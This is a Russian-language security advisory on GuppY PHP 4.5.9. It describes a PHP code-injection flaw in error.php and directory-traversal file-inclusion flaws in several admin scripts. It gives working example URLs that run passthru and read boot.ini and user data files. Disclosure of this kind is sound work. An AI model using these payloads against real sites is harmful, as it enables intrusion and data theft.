Программа: GuppY PHP 4.5.9 и более ранние версии
Уязвимость позволяет удаленному пользователю получить доступ к потенциально
важным данным и выполнить произвольный PHP код на целевой системе с привилегиями
web сервера.
1. Уязвимость существует из-за недостаточной обработки входных данных в
параметре "_SERVER[REMOTE_ADDR]" в сценарии "error.php". Удаленный пользователь
может выполнить произвольный PHP код на целевой системе с привилегиями web
сервера. Удачная эксплуатация уязвимости возможна при включенной опции "register_globals"
и выключенном "magic_quotes_gpc" в конфигурационном файле PHP.
Пример:
http://[target]/[path_to_guppy]/error.php?err=hacker&_SERVER=
&_SERVER[REMOTE_ADDR]=";passthru("ls -la>README");echo"
2. Уязвимость существует при обработке входных данных в параметре "meskin"
сценария "editorTypetool.php" и параметре "lng" в сценариях "archbatch.php" и "nwlmail.php".
удаленный пользователь может подключить и выполнить произвольный файл на
системе. Удачная эксплуатация уязвимости возможна при включенной опции "register_globals"
и выключенном "magic_quotes_gpc" в конфигурационном файле PHP.
Пример:
http://[target]/[path_to_guppy]/admin/editorTypetool.php?cmd=DIR&meskin=..%2F..%2F..%2F..%2F..%2F..
%2F..%2F..%2F..%2F
http://[target]/[path_to_guppy]/admin/inc/archbatch.php?lng=../../../../../../../../../../../boot.ini%00
http://[target]/[path_to_guppy]/admin/inc/dbbatch.php?
lng=../../../../../../../../../../../
http://[target]/[path_to_guppy]/admin/inc/dbbatch.php?lng=../../../../../../../../../../../boot.ini%00
http://[target]/[path_to_guppy]/admin/inc/nwlmail.php?lng=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[target]/[path_to_guppy]/admin/inc/archbatch.php?lng=../../data/usermsg/username.dtb%00